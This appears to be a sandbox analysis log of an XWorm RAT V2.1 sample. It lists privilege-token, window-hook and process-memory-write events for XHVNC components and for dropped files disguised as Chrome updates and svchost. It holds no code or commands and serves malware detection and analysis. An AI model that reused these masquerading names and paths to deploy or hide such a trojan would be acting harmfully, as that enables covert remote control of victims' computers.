N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
N/A N/A C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
N/A N/A C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
N/A N/A C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
N/A N/A C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1408 wrote to memory of 3560 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3560 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
